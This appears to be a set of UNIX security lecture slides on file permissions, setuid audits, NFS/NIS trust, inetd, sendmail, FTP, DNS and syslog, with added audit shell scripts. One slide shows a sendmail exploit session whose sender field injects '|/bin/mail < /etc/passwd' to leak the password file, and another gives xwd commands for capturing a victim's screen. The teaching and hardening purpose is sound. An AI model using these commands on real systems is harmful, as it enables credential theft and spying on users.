UNIX FILE SYSTEM

1 UNIX FILE SYSTEM
File System Security. In the UNIX operating system there is no concept of separate disk drives. After the boot process, every directory and file is "mounted" into a single unified file system that starts at the root '/'.

2 SUN OS File System
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ df -k
Filesystem kbytes used avail capacity Mounted on
/dev/dsk/c0t0d0s % /
/dev/dsk/c0t0d0s % /usr
/proc % /proc
fd % /dev/fd
/dev/dsk/c0t0d0s % /var
/dev/dsk/c0t0d0s % /opt
/dev/dsk/c0t0d0s % /other
/dev/dsk/c0t0d0s % /usr/openwin
swap % /tmp
/dev/dsk/c0t1d0s % /squid
$

3 Linux File System
[citd@server citd]$ df -k
Filesystem blocks Used Available Capacity Mounted on
/dev/sda % /
/dev/sda % /export
/dev/sda % /usr
/dev/sda % /var
citd]$

4 Directory tree
/
  /bin
  /sbin
  /usr
    /usr/bin
    /usr/sbin
    /usr/local
    /usr/doc
  /etc
  /lib
  /var
    /var/adm
    /var/log
    /var/spool

5 CORRESPONDENCE BETWEEN DISK PARTITIONS AND THE FILE SYSTEM STRUCTURE
[Diagram: separate partitions mounted at /, /usr, /usr/home and /squid, and a CD mounted at /mnt/cdrom under /mnt]

6 INTRODUCTION TO THE IMPORTANT UNIX DIRECTORIES
/ (root directory), /bin, /sbin, /usr/bin, /usr/sbin, /var, /var/log, /var/adm, /home, /export/home (SunOS)

7 Unix file and directory permissions and ownership
(directory and file permission and ownership) Output of the command ls -l:
-rw-r--r-- 1 fido users Dec :31 myfile
When a file or directory is created, it takes the owner and group of the user who created it. The permission bits granted to user, group and other depend on the value of umask.

8 Umask and file access permissions
Example:
tnminh]$ umask 002
tnminh]$ echo "tao mot file" > tmp
tnminh]$ ls -l
total 5472
-rw-rw-r-- tnminh tnminh Oct 3 21:55 tmp
/etc]$ umask 022
tnminh]$ echo "tao mot file khac" > tmp1
-rw-r--r-- tnminh tnminh Oct 3 21:59 tmp1

9 Binary form of file and directory access permissions
File access permissions are divided into three octal digits, one each for the owner (user), the group, and everyone else (others). Each digit is the sum of: read permission 4, write permission 2, execute permission 1. Hence:
0 or ---: no permissions at all
4 or r--: read-only
2 or -w-: write-only (rare)
1 or --x: execute
6 or rw-: read and write
5 or r-x: read and execute
3 or -wx: write and execute (rare)
7 or rwx: read, write, and execute

10 Changing file and directory attributes
Relative (symbolic) form:
chmod g+w myfile  -> add write permission for the group of myfile
chmod o-x myfile  -> remove execute permission for others on myfile
Absolute (numeric) form:
chmod 644 myfile  => myfile will have permissions rw-r--r--
Administrators should prefer the absolute form, because it is safer (the resulting mode does not depend on the previous one). For directories the operations are exactly the same.
chown changes the owner of a file; chgrp changes the group of a file.

11 setuid and setgid bits
Set-user-id: when a program with the set-user-id bit is run, it executes with the privileges of the file's owner, whoever invoked it. Example:
$ ls -l /usr/sbin/sendmail
rwsr-xr-x root root sendmail
Similarly, set-group-id gives the program the privileges of the program file's group. The fourth (leading) octal digit encodes these bits: 4 = setuid, 2 = setgid. If /bin/sh had the setuid bit set, everyone would be root, because the owner of /bin/sh is root and every user runs /bin/sh at login.
setgid on a directory: files created in the directory get the directory's group instead of the creator's group.
setuid on a directory: no effect.
Sticky bit: a user may only delete files of which they are the owner. Example: /tmp
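The umask arithmetic of slides 8 to 10 and the setuid, setgid and sticky bits of slide 11, worked through in POSIX shell. This is an added example, not code from the slides; the function names mode_after_umask and mode_to_rwx are chosen here.

```shell
#!/bin/sh
# Added example (not from the slides): how umask shapes a new file's mode,
# and how an octal mode (including the setuid/setgid/sticky bits) maps to
# the rwx string that ls -l prints.

# mode_after_umask BASE UMASK
#   BASE is the mode the creating call asks for: 666 for a regular file,
#   777 for a directory. Every bit set in UMASK is cleared from it.
mode_after_umask() {
    printf '%03o\n' "$(( 0$1 & ~0$2 ))"
}

# mode_to_rwx MODE
#   MODE is up to four octal digits, e.g. 644, 4755 (setuid), 2755 (setgid),
#   1777 (sticky). Prints the nine-character permission string.
mode_to_rwx() {
    m=$(( 0$1 ))
    out=""
    shift_by=6                     # user bits sit at 6, group at 3, other at 0
    for letter in s s t; do        # special-bit letter for user, group, other
        bits=$(( (m >> shift_by) & 7 ))
        # 04000 = setuid (user), 02000 = setgid (group), 01000 = sticky (other)
        special=$(( m & (01000 << (shift_by / 3)) ))
        r=-; w=-; x=-
        [ $(( bits & 4 )) -ne 0 ] && r=r
        [ $(( bits & 2 )) -ne 0 ] && w=w
        if [ $(( bits & 1 )) -ne 0 ]; then
            x=x
            [ "$special" -ne 0 ] && x=$letter          # s or t: special + execute
        elif [ "$special" -ne 0 ]; then
            case $letter in s) x=S ;; t) x=T ;; esac  # special bit without execute
        fi
        out="$out$r$w$x"
        shift_by=$(( shift_by - 3 ))
    done
    printf '%s\n' "$out"
}

# Walk through the slides' own cases: the two umasks of slide 8 and the
# modes of slides 10 and 11.
for u in 002 022; do
    f=$(mode_after_umask 666 "$u"); d=$(mode_after_umask 777 "$u")
    printf 'umask %s: new file %s (%s), new directory %s (%s)\n' \
        "$u" "$f" "$(mode_to_rwx "$f")" "$d" "$(mode_to_rwx "$d")"
done
for mode in 644 4755 2755 1777; do
    printf 'chmod %s -> %s\n' "$mode" "$(mode_to_rwx "$mode")"
done
```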

12 Securing the system by checking setuid and setgid bits
Find files with the setuid bit set:
find / -perm -4000 -exec ls -l {} \;
Likewise for setgid (-perm -2000).
Find files with no owner:
find / -nouser -exec ls -l {} \;
Find world-writable files:
find / -perm -2 -print
Find unowned files:
find / -nouser -print

13 -r-s--x--x 1 root root 10704 Apr 15 1999 /usr/bin/passwd
-rws--x--x 2 root root Apr /usr/bin/suidperl
-rws--x--x 2 root root Apr /usr/bin/sperl
-rwsr-sr-x 1 root mail Apr /usr/bin/procmail
-rwsr-xr-x 1 root root Apr /usr/bin/rcp
-rwsr-xr-x 1 root root Apr /usr/bin/rlogin
Note: never give a shell script the setuid or setgid bit. If setuid or setgid is needed, write the program in C or a comparable compiled language.

14 Some "dangerous" files. Trusted hosts
/etc/hosts.equiv: a user coming from a host whose IP address is listed in this file, and who has the same account name, can use rlogin and rsh on this machine without entering a password. Fortunately root is an exception.
.rhosts: like /etc/hosts.equiv, but checked per host-user pair. In particular, a user can create a .rhosts file without going through the administrator. It is therefore best to forbid .rhosts files in home directories altogether.

15 Checksum and checklist
The sum command lets us check whether the contents of a file have been modified. This helps detect viruses, since a virus generally has to change the contents of a file. Run sum over directories whose contents should in principle never change, such as /sbin and /bin. Record the results in a file and use it later to find the files whose checksum has changed.
A checklist (produced with ls) lets us find changes to the system files. As with the checksums, create the checklist file right at the start. That way we can also spot newly created files that should not be there.

16 Access Control List (ACL)
This is a newer Unix standard that allows access to the file system to be controlled in finer detail than traditional Unix permissions. It allows, for example, the whole group ggg to have read permission while user uuu of that group ggg has read and write permission. The two basic ACL commands are getfacl and setfacl. To add ACL entries to a file we use setfacl -m acl_entry_list filename. To tell whether a file carries an ACL, look at ls -l: -rw-r--r--+ etc. The + sign shows that the file uses an ACL. ACLs are available on SunOS 5.6.

17 Network File System (NFS)
NFS, the Network File System, has three important characteristics: it makes sharing of files over a network possible; it mostly works well enough; it opens a can of security risks that are well understood by crackers and easily exploited to get access (read, write and delete) to all your files.
In principle the NFS server trusts the NFS client and vice versa. A compromise of either the NFS server or an NFS client therefore easily leads to a compromise of the whole NFS network.

18 NFS model
Server: eris. /etc/exports:
/mn/eris/local apollon(rw)
Client: apollon
mount -o rsize=1024,wsize=1024 eris:/mn/eris/local /mnt
cd /mnt
ls -l
Or in /etc/fstab:
# device mountpoint fs-type options dump fsckorder
eris:/mn/eris/local /mnt nfs rsize=1024,wsize=

19 NFS Client Security
nosuid option: the server's root user cannot make a suid-root program on the file system, log in to the client as a normal user and then use the suid-root program to become root on the client.

20 Remote Procedure Call (RPC)-based services
- For the TCP and UDP protocols a port number is 2 bytes (65536 max.).
- Each RPC-based service has a unique 4-byte RPC service number (about 4294 million).
- The portmapper listens on port 111 (TCP and UDP).
- When an RPC-based server starts, it takes a TCP or UDP port and then tells the portmapper the mapping between its unique RPC number and the TCP/UDP port it has just received.
- When an RPC client wants to connect to an RPC-based server, it "asks" the portmapper and learns the TCP port on which the RPC-based server is listening.
- Client and server then "forget" the portmapper and talk to each other directly.
- An intruder can bypass the portmapper.

21 NFS Server Security
root_squash option: now, if a user with UID 0 on the client attempts to access (read, write, delete) the file system, the server substitutes the UID of the server's `nobody' account. This means that the root user on the client cannot access or change files that only root on the server can access or change.
But the client's root can su to bin or adm and can then get at files on the server owned by bin. Important binaries and files should therefore be owned by root.
The portmapper and nfsd can have security problems that allow unauthorised access to the server's file system. To close this hole, put portmap: ALL in /etc/hosts.deny and portmap: <your network>/<netmask> in /etc/hosts.allow, so that only the local network may use the portmapper.
If /etc/exports lists only a file system with no host, every host may mount that file system from the server.

22 Network Information Service (NIS, NIS+)
SUN 1990
NIS is a service that provides information, that has to be known throughout the network, to all machines on the network. Information likely to be distributed by NIS is:
· login names/passwords/home directories (/etc/passwd)
· group information (/etc/group)
If, for example, your password entry is recorded in the NIS passwd database, you will be able to login on all machines on the network which have the NIS client programs running. NIS+ is designed by Sun Microsystems Inc. as a replacement for NIS with better security and better handling of large installations.

23 NIS security problems
A workstation that joins NIS must have an /etc/passwd whose last line is:
+::0:0:::
or
+:
If we use the first form and forget the + sign, we get a super-user with no login name and no password ;-(. So use the second form.
If /etc/hosts.equiv contains only +, every user on every host who has the same account name as on this machine can log in without a password. Note that some Unix versions, including SUN's, install hosts.equiv with exactly that one line ;-(
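The dangerous patterns in the trust files of slides 14, 21 and 23 (an /etc/exports entry with no host, a lone + in hosts.equiv, a passwordless UID 0 entry left when the + of the NIS line is forgotten), checked by a small POSIX shell script. This is an added example, not code from the slides; the function names and the constructed sample files are ours, and the functions can be pointed at the real /etc files instead.

```shell
#!/bin/sh
# Added example (not from the slides): audit the trust files discussed on
# slides 14, 21 and 23 for the patterns they warn about. Each function takes
# a file path; demo runs them on constructed copies so it works offline.

# exports_without_host FILE
#   Print each exported file system that names no client host, i.e. one that
#   every host may mount. Entries with only an option list, "/path (rw)", count.
exports_without_host() {
    sed 's/#.*//' "$1" | awk '
        NF == 0 { next }
        {
            open = (NF == 1)
            for (i = 2; i <= NF; i++) if ($i ~ /^\(/) open = 1
            if (open) print $1
        }'
}

# hosts_equiv_wildcard FILE
#   Print lines of hosts.equiv whose host field is "+" (every host trusted).
hosts_equiv_wildcard() {
    awk '$1 == "+" { print }' "$1"
}

# passwd_uid0_nopass FILE
#   Print passwd lines giving UID 0 with an empty password field, other than
#   the NIS marker "+::0:0:::" itself: the "::0:0:::" left when the plus sign
#   is forgotten is a passwordless super-user with an empty login name.
passwd_uid0_nopass() {
    awk -F: '$1 != "+" && $2 == "" && $3 == "0" { print "line " NR ": <" $1 ">" }' "$1"
}

# demo: constructed files reproducing the slides' examples (not real /etc files).
demo() {
    work=$(mktemp -d) || return 1
    printf '%s\n' '# constructed /etc/exports' \
        '/mn/eris/local apollon(rw)' '/export/home' '/usr/local (ro)' > "$work/exports"
    printf '%s\n' 'apollon' '+' > "$work/hosts.equiv"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/sh' '::0:0:::' '+::0:0:::' > "$work/passwd"

    echo "exports mountable by any host:";          exports_without_host "$work/exports"
    echo "hosts.equiv entries trusting every host:"; hosts_equiv_wildcard "$work/hosts.equiv"
    echo "passwd UID 0 entries without a password:"; passwd_uid0_nopass "$work/passwd"
    rm -rf "$work"
}

demo
```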

24 #!/bin/sh
#
# fscheck - check file system for insecurities
# This should be run as root
PATH=/usr/bin:/bin
export PATH
CHECKDIRS="/bin /etc /usr/bin /usr/etc /usr/lib /usr/ucb"
# ls.master is the file to create by command 'ls -alsgR $CHECKDIRS > ls.master'
MASTER_LS=ls.master
# sum.master is the file to create by command
# 'find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > sum.master'
MASTER_SUM=sum.master
#
echo "Set-User-Id files found:"
find / -type f -a -perm -4000 -exec ls -aslg {} \;
echo ""
echo "Set-Group-Id files found:"
find / -type f -a -perm -2000 -exec ls -aslg {} \;
echo "Device files not located in /dev :"
find / \( -type b -o -type c \) -print | grep -v '^/dev'
echo "World writable files and directories : "
find / -perm -2 -exec ls -aslgd {} \;

25 #
echo "Files owned by nonexistent user or group :"
find / \( -nouser -o -nogroup \) -exec ls -aslgd {} \;
echo ""
ls -alsgR $CHECKDIRS > /tmp/lschk.$$
find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > /tmp/sumchk.$$
echo "Files in $CHECKDIRS whose attributes have changed : "
echo "< = master check list, > = current listing"
diff $MASTER_LS /tmp/lschk.$$
echo "Files in $CHECKDIRS whose checksums have changed:"
diff $MASTER_SUM /tmp/sumchk.$$
rm -f /tmp/lschk.$$ /tmp/sumchk.$$
exit 0
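The checksum-and-checklist idea of slide 15 and the master/compare loop of the fscheck script above, as an added POSIX shell example that is not part of the slides. It uses cksum rather than sum (cksum is the POSIX tool) and, instead of a raw diff, reports which files changed, appeared or disappeared; make_baseline, compare_baseline and the constructed sample tree are names and data chosen here.

```shell
#!/bin/sh
# Added example (not the slides' fscheck script): a checksum baseline for a
# set of directories and a comparison that names changed, added and removed
# files. cksum is used instead of sum because cksum is the POSIX tool.

# make_baseline DIR...  ->  "crc size path" per regular file, sorted by path.
#   Save the output where an intruder cannot reach it (the slides suggest
#   recording it right after installation); it is the MASTER for compare.
make_baseline() {
    find "$@" -type f -exec cksum {} + | sort -k3
}

# compare_baseline MASTER DIR...  ->  ADDED / CHANGED / REMOVED lines.
#   Paths containing spaces are not handled (cksum's third field ends there).
compare_baseline() {
    master=$1; shift
    current=$(mktemp) || return 1
    make_baseline "$@" > "$current"
    awk '
        FILENAME == ARGV[1] { old[$3] = $1 " " $2; next }   # master records
        {
            if (!($3 in old))                print "ADDED   " $3
            else if (old[$3] != ($1 " " $2)) print "CHANGED " $3
            seen[$3] = 1
        }
        END { for (p in old) if (!(p in seen)) print "REMOVED " p }
    ' "$master" "$current" | sort
    rm -f "$current"
}

# demo: a constructed tree standing in for /bin and /etc; after the baseline
# is taken one file is altered, one is added and one is removed.
demo() {
    work=$(mktemp -d) || return 1
    mkdir -p "$work/bin" "$work/etc"
    printf 'original binary\n' > "$work/bin/ls"
    printf 'root:*:0:0:::\n'    > "$work/etc/passwd"
    make_baseline "$work/bin" "$work/etc" > "$work/master.sum"

    printf 'modified binary\n' > "$work/bin/ls"      # contents changed
    printf 'new\n'             > "$work/bin/extra"   # file appeared
    rm -f "$work/etc/passwd"                          # file disappeared

    compare_baseline "$work/master.sum" "$work/bin" "$work/etc" |
        sed "s|$work|WORK|"                           # hide the temp path
    rm -rf "$work"
}

demo
```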

26 Lesson 3: Network Service Security
So far we have mostly discussed protection against intrusions that exploit weaknesses or installation errors of the UNIX operating system itself. We now turn to intrusions through the services that a Unix machine offers to the network.

27 Inetd and /etc/inetd.conf
inetd is used to start the daemons that provide network services. inetd listens for network connections on a number of ports. When a connection request arrives, inetd invokes the corresponding server program to handle the connection. inetd reads /etc/inetd.conf when it is loaded into memory.
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
# Echo, discard, daytime, and chargen are used primarily for testing.
# To re-read this file after changes, just do a 'killall -HUP inetd'
#time stream tcp nowait root internal
#time dgram udp wait root internal
#
# These are standard services.
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

28 Inetd and security
/etc/inetd.conf can be used to solve several security problems:
- If we do not want to offer a service, we simply put a # in front of its configuration line. On machines that require high security, the general rule is to disable every service we do not need or do not understand. If the machine then misbehaves, we remove the # comments one at a time, and in doing so we learn what each service is for.
- Services to consider removing are finger, tftp and talk.
- For a service with a known security problem that cannot be switched off, we can reduce its privileges by changing the user field.

29 Email, SMTP and Sendmail
- Email is the most basic and widespread Internet service. The protocol used for the connection is SMTP (Simple Mail Transfer Protocol).
- Sendmail is the most popular SMTP server. Although sendmail has had many security "scandals" over its history, no program has yet been able to replace it, especially in terms of features. Sendmail's bugs stem from its size and complexity (its number of lines of code), and from the fact that, while running, sendmail needs root privileges to do its job. On the other hand, because so many people use sendmail, its bugs are found very quickly and widely reported, which allows them to be fixed quickly.

30 Two ways into a mail server
1. Through the commands the mail server accepts from outside: command channel attacks. The Morris worm used this route, exploiting sendmail's debug bug.
2. Through the content of the mail: data-driven attacks. Every mail server program uses a local mail program to deliver and receive mail on the machine and to interface with the user; on Unix this is usually /bin/mail. If /bin/mail has a bug, an intruder can make /bin/mail execute commands written in the body of a message. Today's e-mail is usually multimedia, so external programs are needed to "read" it. Which external program "reads" a message, and how, is outside the control of the classic mail programs. For example, one Christmas IBM's network was paralysed when millions of messages carrying a Christmas tune were sent automatically. Be careful with messages that advise you to change your password to a new one "from the admin", or to tell the bank the personal code of your Visa card.

31 Checking the running sendmail
Points to check: use a recent version. Check the sendmail version, because some old versions have known security problems.
$ telnet pasteur.bvt.hcm 25
220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov :46:
The wiz and debug functions must not be present:
220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov :46:35 700
wiz
500 Command unrecognized: "wiz"
debug
500 Command unrecognized: "debug"
If debug is enabled, your sendmail version must be replaced.

32 Example of a sendmail bug
telnet victim.com 25
Trying …
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
Mail from : "|/bin/mail < /etc/passwd"
250 "|/bin/mail < /etc/passwd" … sender OK
Rcpt to : nosuchuser
550 nosuchuser … User unknow
Data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
Quit
Connection closed by foreign host.
$

33 FTP
The File Transfer Protocol is implemented by ftp and ftpd. Use an ftpd released after 1989. To secure ftp, anonymous FTP must be configured carefully:
- create an ftp account with * in the password field so that it cannot log in;
- create a home directory for the ftp account (e.g. /home/ftp), owned by ftp and writable by nobody: chown ftp ~ftp; chmod 555 ~ftp
- create the bin, etc and usr directories as required by the Unix in use, all with mode 555;
- copy the passwd and group files into ~ftp/etc and delete every account except ftp; these two files get mode 444.

34 ftp (2)
Copy ls into ~ftp/bin with mode 111.
Create ~ftp/pub with mode 577, owner ftp. Anonymous connections use the ftp account. Nowadays, if we install wu-ftp, the permissions of these directories are set automatically. Example ftp configuration on RedHat 6.0:
/home]$ ls -l
total 9
drwxr-xr-x 6 root root Mar ftp
drwxr-xr-x 2 root nobody Apr samba

35 ftp (3)
[tnminh@pateur /home]$ ls -l ftp
total 4
d--x--x--x 2 root root Nov 5 02:15 bin
d--x--x--x 2 root root Nov 5 02:15 etc
drwxr-xr-x 2 root root Nov 5 02:15 lib
dr-xr-sr-x 2 root ftp Mar pub
/home]$
etc]# more ~ftp/etc/passwd
root:*:0:0:::
bin:*:1:1:::
operator:*:11:0:::
ftp:*:14:50:::
nobody:*:99:99:::
etc]#

36 ftp (4): /etc/ftpusers
/etc/ftpusers lists the accounts that may not connect via ftp, e.g. root, bin … Example /etc/ftpusers from Linux RedHat 6.0:
/tmp]# more /etc/ftpusers
root
bin
daemon
adm
lp
sync

37 shutdown
halt
mail
news
uucp
operator
games
nobody
/tmp]#
The file /etc/shells lists the shells users are allowed to use, such as bash, sh, ash, bsh ...

38 tftp
Because tftp requires no password, pay attention to its security. The tftp of SunOS before 4.0 has a bug that allows files to be fetched, even from /etc. Replace that version.

39 Domain Name System (DNS)
The first DNS flaw is that DNS servers and clients do not check whether the answer they receive comes from the server they asked or from some other source. A server may cache this bogus information and use it to answer later queries. For example, an intruder can tell the server that the IP address of their machine is that of a machine you trust, and their machine can then rlogin without a password. BIND version 4.9 fixes the flaw described above.
On some OSes (e.g. SunOS 4.x) a lookup/double reverse lookup is performed automatically: DNS resolves IP -> name and then name -> IP and checks that the two IP addresses match. This method does not, however, completely eliminate the DNS flaw.

40 Social engineering attack
DNS usually gives away a lot of information about the internal network, such as host names and machine types … An intruder armed with this information can pose as a maintenance technician, ask to look at a machine, and may ask for a password. How do we avoid giving the intruder too much information? One option is to run two DNS servers: one inside the firewall that holds the full information, and a second outside that holds only the minimum needed for the network's connectivity. The HINFO and TXT fields in particular often contain information meant purely for internal use.

41 [Diagram: Internet | packet filter | fake DNS server outside; real DNS server and DNS clients inside]

42 Setting up the fake and real servers
The fake server is the primary server for your domain. The primary server must hold enough information about the machines that connect directly to the Internet, such as the www, ftp and news servers. That information must allow a double reverse lookup to succeed, since many ftp and mail servers today only serve a client after a successful double reverse lookup.
The real DNS server has a forwarders directive pointing at the fake server, and the real server is a slave server; the real server thus asks the fake server about addresses it does not know. The real server can hold every detail of the internal network to answer the DNS clients inside the network, and no outsider can retrieve this information. Even the DNS client on the machine hosting the fake DNS server queries the real server, via resolv.conf.

43 SYSLOG /etc/syslog.conf
The facility is one of the following keywords: auth, auth-priv, cron, daemon, kern, lpr, mail, mark, news, security (same as auth), syslog, user, uucp and local0 through local7. The keyword security should not be used anymore and mark is only for internal use and therefore should not be used in applications. Anyway, you may want to specify and redirect these messages here. The facility specifies the subsystem that produced the message, i.e. all mail programs log with the mail facility (LOG_MAIL) if they log using syslog.
The priority is one of the following keywords, in ascending order: debug, info, notice, warning, warn (same as warning), err, error (same as err), crit, alert, emerg, panic (same as emerg). The keywords error, warn and panic are deprecated and should not be used anymore. The priority defines the severity of the message.
In general, /var/adm/messages holds the information about logon activity. Pay particular attention to logins by root. A good general rule is to log in with an ordinary account and su when necessary, so that we know who is using root privileges. /etc/syslog.conf can be configured to log messages to another machine.

44 SYSLOG (2) /etc/syslog.conf
# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.* /dev/console
# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;news.none;authpriv.none /var/log/messages
# The authpriv file has restricted access.
authpriv.* /var/log/secure
# Log all the mail messages in one place.
mail.* /var/log/maillog
# Everybody gets emergency messages, plus log them on another
# machine.
*.emerg *

45 /etc/syslog.conf
# Save mail and news errors of level err and higher in a
# special file.
uucp,news.crit /var/log/spooler
# Save boot messages also to boot.log
local7.* /var/log/boot.log
#
# INN
news.=crit /var/log/news/news.crit
news.=err /var/log/news/news.err
news.notice /var/log/news/news.notice
/tmp]#

46 TCPDUMP
tcpdump is a utility for monitoring connections. It is a very powerful tool for maintaining the network and, at the same time, for watching for intrusion attempts. Some commonly used options:

47 Capturing what is on the screen
With a couple of commands an intruder can copy the contents of another user's screen:
xwd -display victim:0 -root > screen.out
xwud -in screen.out

48 Summary
- Review /etc/inetd.conf and remove unnecessary services, especially on bastion hosts.
- Change the user of services to "weaker" users, e.g. run finger as nobody.
- Check the ftp installation carefully and test whether anonymous ftp can write (upload).
- Check the versions of sendmail, /bin/mail, named, finger and tftp.
- Configure the syslog system.
- Monitor connections with tcpdump or an equivalent program.

